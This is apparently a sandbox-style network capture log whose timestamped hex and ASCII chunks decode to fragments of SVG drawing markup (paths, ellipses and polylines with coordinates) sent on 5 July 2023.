                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10425INData Raw: 30 2c 30 2c 30 2c 2e 37 36 2e 36 2c 36 2e 35 38 2c 36 2e 35 38 2c 30 2c 30 2c 30 2c 32 2e 33 35 2c 31 2e 30 37 2c 37 2e 32 38 2c 37 2e 32 38 2c 30 2c 30 2c 30 2c 32 2e 33 37 2d 2e 30 39 6c 31 2e 38 37 2d 2e 32 37 61 35 2e 32 34 2c 35 2e 32 34 2c 30 2c 30 2c 30 2c 32 2e 35 38 2d 2e 38 35 41 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 30 2c 39 30 35 2e 35 37 2c 32 35 33 2e 35 32 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 33 34 22 20 64 3d 22 4d 38 39 36 2e 39 32 2c 32 34 36 2e 37 33 61 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 37 34 2d 2e 35 35 63 30 2d 2e 34 32 2e 32 37 2d 2e 37 39 2e 32 32 2d 31 2e 32 32 61 36 2e 34 38 2c 36 2e 34 38 2c 30 2c 30 2c 31 2c 32 2e 33 32 2d 2e 30 35 63 2d 2e 35 38 2e 39 34 2e 33 34 2c 32 2e 31 2c
                                                                                                                                                                                                                                                                          Data Ascii: 0,0,0,.76.6,6.58,6.58,0,0,0,2.35,1.07,7.28,7.28,0,0,0,2.37-.09l1.87-.27a5.24,5.24,0,0,0,2.58-.85A2.91,2.91,0,0,0,905.57,253.52Z"/><path class="cls-134" d="M896.92,246.73a2.36,2.36,0,0,1,.74-.55c0-.42.27-.79.22-1.22a6.48,6.48,0,0,1,2.32-.05c-.58.94.34,2.1,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10441INData Raw: 36 37 2c 34 2e 37 36 2e 36 36 2c 37 2e 32 61 31 30 2e 36 34 2c 31 30 2e 36 34 2c 30 2c 30 2c 31 2d 32 2d 2e 31 38 2c 39 2c 39 2c 30 2c 30 2c 31 2d 31 2e 31 33 2d 2e 33 31 63 2d 2e 32 32 2d 2e 30 35 2d 31 2e 32 36 2d 2e 34 35 2d 31 2e 34 35 2d 2e 33 73 2e 31 38 2e 37 2e 33 32 2e 38 39 63 2e 32 36 2e 33 37 2e 33 34 2e 34 36 2e 32 33 2e 39 61 2e 38 33 2e 38 33 2c 30 2c 30 2c 31 2d 2e 35 31 2e 36 38 63 2d 2e 31 33 2e 30 36 2d 2e 38 36 2e 32 32 2d 31 2c 2e 31 33 2c 31 2e 32 34 2c 31 2e 31 39 2c 33 2e 32 36 2c 31 2c 34 2e 38 36 2c 31 2e 32 6c 32 2e 34 33 2e 32 34 63 2e 36 2e 30 36 2c 31 2e 31 37 2e 31 33 2c 31 2e 34 35 2d 2e 35 34 61 33 2e 38 37 2c 33 2e 38 37 2c 30 2c 30 2c 30 2c 2e 31 32 2d 31 2e 33 31 63 30 2d 31 2d 2e 31 36 2d 32 2d 2e 32 2d 33 43 38 32 37
                                                                                                                                                                                                                                                                          Data Ascii: 67,4.76.66,7.2a10.64,10.64,0,0,1-2-.18,9,9,0,0,1-1.13-.31c-.22-.05-1.26-.45-1.45-.3s.18.7.32.89c.26.37.34.46.23.9a.83.83,0,0,1-.51.68c-.13.06-.86.22-1,.13,1.24,1.19,3.26,1,4.86,1.2l2.43.24c.6.06,1.17.13,1.45-.54a3.87,3.87,0,0,0,.12-1.31c0-1-.16-2-.2-3C827
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10457INData Raw: 2d 33 2d 31 33 2e 35 2d 33 6c 2d 33 30 2e 36 39 2d 33 2e 35 37 63 2d 31 2e 32 34 2d 2e 30 38 2d 34 2d 34 2d 34 2e 38 33 2d 34 2e 39 61 34 33 2e 30 37 2c 34 33 2e 30 37 2c 30 2c 30 2c 30 2d 34 2e 31 37 2d 33 2e 39 35 63 2d 32 2e 30 36 2d 31 2e 37 36 2d 33 2e 39 34 2d 33 2e 38 2d 35 2e 38 39 2d 35 2e 36 38 6c 2d 31 30 2d 39 2e 36 34 63 2d 36 2e 33 36 2d 31 2e 35 36 2d 31 32 2e 37 36 2d 33 2d 31 39 2e 31 32 2d 34 2e 35 36 2d 34 2e 33 35 2d 31 2e 30 38 2d 38 2e 37 34 2d 36 2e 31 33 2d 31 32 2e 38 36 2d 37 2e 38 31 2d 31 2e 32 33 2d 35 2e 31 34 2d 31 2e 35 38 2d 39 2d 33 2e 39 35 2d 31 37 2e 34 38 2d 2e 30 36 2d 2e 32 32 2c 31 2e 32 32 2d 39 2c 31 2e 36 38 2d 39 2c 31 32 2e 30 39 2e 31 34 2c 32 31 2c 2e 35 36 2c 33 33 2c 2e 36 35 2c 32 33 2c 2e 31 38 2c 34 35
                                                                                                                                                                                                                                                                          Data Ascii: -3-13.5-3l-30.69-3.57c-1.24-.08-4-4-4.83-4.9a43.07,43.07,0,0,0-4.17-3.95c-2.06-1.76-3.94-3.8-5.89-5.68l-10-9.64c-6.36-1.56-12.76-3-19.12-4.56-4.35-1.08-8.74-6.13-12.86-7.81-1.23-5.14-1.58-9-3.95-17.48-.06-.22,1.22-9,1.68-9,12.09.14,21,.56,33,.65,23,.18,45
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11291INData Raw: 72 79 3d 22 30 2e 31 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 37 20 35 36 33 2e 36 34 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 34 30 2e 36 39 22 20 63 79 3d 22 32 31 34 2e 30 39 22 20 72 78 3d 22 30 2e 31 35 22 20 72 79 3d 22 30 2e 31 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 36 2e 38 36 20 35 36 33 2e 39 39 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 33 39 2e 30 38 22 20 63 79 3d 22 32 31 34 2e 30 35 22 20 72 78 3d 22 30 2e 31 35 22 20
                                                                                                                                                                                                                                                                          Data Ascii: ry="0.19" transform="translate(47 563.64) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="840.69" cy="214.09" rx="0.15" ry="0.19" transform="translate(46.86 563.99) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="839.08" cy="214.05" rx="0.15"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11307INData Raw: 63 79 3d 22 32 33 33 2e 36 37 22 20 72 78 3d 22 30 2e 31 37 22 20 72 79 3d 22 30 2e 32 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 38 2e 37 38 20 35 35 30 2e 37 36 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 31 32 2e 39 38 22 20 63 79 3d 22 32 33 34 2e 30 39 22 20 72 78 3d 22 30 2e 31 37 22 20 72 79 3d 22 30 2e 32 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 38 2e 36 33 20 35 35 31 2e 31 35 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 31 33 2e 34
                                                                                                                                                                                                                                                                          Data Ascii: cy="233.67" rx="0.17" ry="0.22" transform="translate(28.78 550.76) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="812.98" cy="234.09" rx="0.17" ry="0.22" transform="translate(28.63 551.15) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="813.4
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11355INData Raw: 73 20 31 20 6e 6f 72 6d 61 6c 20 6e 6f 6e 65 20 72 75 6e 6e 69 6e 67 3b 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 20 73 76 67 2d 61 6e 69 6d 22 20 64 3d 22 4d 38 30 38 2e 38 35 2c 32 38 31 2e 37 37 61 31 2e 38 35 2c 31 2e 38 35 2c 30 2c 30 2c 31 2c 2e 31 31 2d 2e 33 31 63 2d 2e 33 31 2e 36 37 2d 31 2c 31 2d 31 2e 30 39 2c 31 2e 37 38 61 31 31 2c 31 31 2c 30 2c 30 2c 30 2d 2e 31 35 2c 31 2e 31 35 63 30 2c 2e 34 34 2e 32 2e 36 32 2e 33 31 2c 31 2c 2e 32 32 2e 37 34 2d 2e 31 37 2c 31 2e 37 35 2d 31 2e 30 37 2c 31 2e 34 35 2d 2e 36 39 2d 2e 32 33 2d 31 2e 31 2d 31 2d 31 2e 36 2d 31 2e 34 35 61 31 31 2e 37 36 2c 31 31 2e 37 36 2c 30 2c 30 2c 31 2d 31 2e 38 39 2d 31 2e 37 37 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: s 1 normal none running;"></path><path class="cls-38 svg-anim" d="M808.85,281.77a1.85,1.85,0,0,1,.11-.31c-.31.67-1,1-1.09,1.78a11,11,0,0,0-.15,1.15c0,.44.2.62.31,1,.22.74-.17,1.75-1.07,1.45-.69-.23-1.1-1-1.6-1.45a11.76,11.76,0,0,1-1.89-1.77,2.39,2.39,0,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11435INData Raw: 35 2e 36 36 20 35 39 38 2e 34 35 20 32 32 31 2e 37 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 32 22 20 70 6f 69 6e 74 73 3d 22 35 37 39 2e 35 34 20 32 31 31 2e 31 32 20 35 39 32 2e 36 35 20 32 31 36 2e 32 33 20 35 39 39 2e 32 20 32 32 30 2e 32 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 32 22 20 70 6f 69 6e 74 73 3d 22 35 37 37 2e 38 32 20 32 33 35 2e 32 32 20 35 39 30 2e 35 20 32 33 39 2e 35 34 20 35 39 37 2e 38 31 20 32 33 36 2e 33 37 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 33 22 20 70 6f 69 6e 74 73 3d 22 35 37 37 2e 38 32 20 32 35 30 2e 33 31 20 35 39 30 2e 35 20 32
                                                                                                                                                                                                                                                                          Data Ascii: 5.66 598.45 221.7"></polyline><polyline class="cls-52" points="579.54 211.12 592.65 216.23 599.2 220.2"></polyline><polyline class="cls-52" points="577.82 235.22 590.5 239.54 597.81 236.37"></polyline><polyline class="cls-53" points="577.82 250.31 590.5 2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11483INData Raw: 61 6e 69 6d 22 20 64 3d 22 4d 36 30 39 2e 33 33 2c 33 30 34 2e 38 39 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 30 2c 2e 32 2d 2e 32 38 63 2d 2e 34 2e 36 37 2d 2e 33 31 2c 31 2e 34 38 2d 2e 39 2c 32 61 39 2e 39 34 2c 39 2e 39 34 2c 30 2c 30 2c 31 2d 2e 39 32 2e 38 63 2d 2e 33 38 2e 32 37 2d 2e 36 35 2e 32 2d 31 2c 2e 33 33 2d 2e 37 38 2e 32 35 2d 31 2e 34 33 2c 31 2e 31 37 2d 2e 36 34 2c 31 2e 37 38 61 35 2e 31 38 2c 35 2e 31 38 2c 30 2c 30 2c 30 2c 32 2e 32 31 2e 35 34 2c 31 32 2e 31 31 2c 31 32 2e 31 31 2c 30 2c 30 2c 30 2c 32 2e 36 35 2e 36 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 30 2c 31 2e 34 35 2d 2e 35 35 63 2e 34 35 2d 2e 34 38 2e 32 38 2d 31 2e 35 37 2e 32 34 2d 32 2e 31 36 2d 2e 30 36 2d 31 2d 2e 34 33 2d 31 2e 39 32 2d 2e 34 31 2d 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: anim" d="M609.33,304.89a1.62,1.62,0,0,0,.2-.28c-.4.67-.31,1.48-.9,2a9.94,9.94,0,0,1-.92.8c-.38.27-.65.2-1,.33-.78.25-1.43,1.17-.64,1.78a5.18,5.18,0,0,0,2.21.54,12.11,12.11,0,0,0,2.65.6,2.52,2.52,0,0,0,1.45-.55c.45-.48.28-1.57.24-2.16-.06-1-.43-1.92-.41-2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11499INData Raw: 30 2c 30 2d 2e 35 32 2d 2e 30 36 2c 31 2e 35 34 2c 31 2e 35 34 2c 30 2c 30 2c 30 2d 2e 37 2e 31 35 2c 31 2e 34 33 2c 31 2e 34 33 2c 30 2c 30 2c 30 2d 2e 35 2e 34 31 2c 31 2e 37 37 2c 31 2e 37 37 2c 30 2c 30 2c 30 2d 2e 33 2e 35 38 2c 32 2e 36 31 2c 32 2e 36 31 2c 30 2c 30 2c 30 2d 2e 30 39 2e 36 39 76 33 68 2d 31 2e 31 33 56 37 31 2e 31 36 43 38 39 34 2e 34 39 2c 37 31 2c 38 39 34 2e 34 39 2c 37 30 2e 38 31 2c 38 39 34 2e 34 38 2c 37 30 2e 35 37 5a 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 20 64 3d 22 4d 39 30 30 2e 31 35 2c 36 37 2e 38 38 61 2e 36 37 2e 36 37 2c 30 2c 30 2c 31 2d 2e 32 32 2e 35 32 2e 37 32 2e 37 32 2c 30 2c 30 2c 31 2d 2e 35 33 2e 32 2e 36 38 2e 36 38 2c 30 2c 30 2c 31 2d 2e 35 32 2d 2e 32 31 2e
                                                                                                                                                                                                                                                                          Data Ascii: 0,0-.52-.06,1.54,1.54,0,0,0-.7.15,1.43,1.43,0,0,0-.5.41,1.77,1.77,0,0,0-.3.58,2.61,2.61,0,0,0-.09.69v3h-1.13V71.16C894.49,71,894.49,70.81,894.48,70.57Z"></path><path class="cls-2" d="M900.15,67.88a.67.67,0,0,1-.22.52.72.72,0,0,1-.53.2.68.68,0,0,1-.52-.21.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11515INData Raw: 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 30 30 2e 31 31 2c 32 30 31 2e 37 32 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 41 32 2e 35 33 2c 32 2e 35 33 2c 30 2c 30 2c 31 2c 36 39 36 2c 32 30 33 61 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                          Data Ascii: 51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.86"></path><path class="cls-4" d="M700.11,201.72a1.73,1.73,0,0,1-.78,2.24A2.53,2.53,0,0,1,696,203a2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"></path><path class="cls-4" d="M
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11531INData Raw: 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 33 31 2e 35 37 2c 32 39 37 2e 38 34 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 33 31 2e 33 34 2c 32 39 30 2e 39 31 61 31 2e 37
                                                                                                                                                                                                                                                                          Data Ascii: 0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path><path class="cls-4" d="M731.57,297.84a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.52-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M731.34,290.91a1.7
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11547INData Raw: 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 34 39 2e 34 32 2c 32 30 30 2e 30 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 34 39 2e 31 39 2c 31 39 33 2e 31 32 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d
                                                                                                                                                                                                                                                                          Data Ascii: th><path class="cls-4" d="M749.42,200.06a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.11,2.11,0,0,1,.16,2.85"></path><path class="cls-4" d="M749.19,193.12a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11563INData Raw: 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 30 2e 36 35 2c 32 38 39 2e 32 34 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: ,1.72,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.37,2.37,0,0,1,.51-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M780.65,289.24a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11579INData Raw: 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 39 38 2e 35 2c 31 39 31 2e 34 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68
                                                                                                                                                                                                                                                                          Data Ascii: .34-.94,2.41,2.41,0,0,1,.52-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"></path><path class="cls-4" d="M798.5,191.45a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11595INData Raw: 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 30 2c 32 38 37 2e 35 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 32 39 2e 37 32 2c 32 38 30 2e 36 33 61 31 2e 37 32 2c 31 2e 37
                                                                                                                                                                                                                                                                          Data Ascii: 0,1,2.89,0,2.11,2.11,0,0,1,.16,2.86"></path><path class="cls-4" d="M830,287.57a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"></path><path class="cls-4" d="M829.72,280.63a1.72,1.7
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12076INData Raw: 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 37 2e 38 31 2c 31 38 39 2e 37 39 41 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2c 38 34 37 2c 31 39 32 61 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 37 2e 35 37 2c 31 38 32 2e 38 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 31
                                                                                                                                                                                                                                                                          Data Ascii: 0,1,.16,2.86"></path><path class="cls-4" d="M847.81,189.79A1.72,1.72,0,0,1,847,192a2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"></path><path class="cls-4" d="M847.57,182.85a1.73,1.73,0,0,1-.78,2.24,2.51
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12092INData Raw: 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 32 37 2c 32 38 35 2e 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2c 32 37 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35
                                                                                                                                                                                                                                                                          Data Ascii: s="cls-4" d="M879.27,285.9a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"></path><path class="cls-4" d="M879,279a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.5
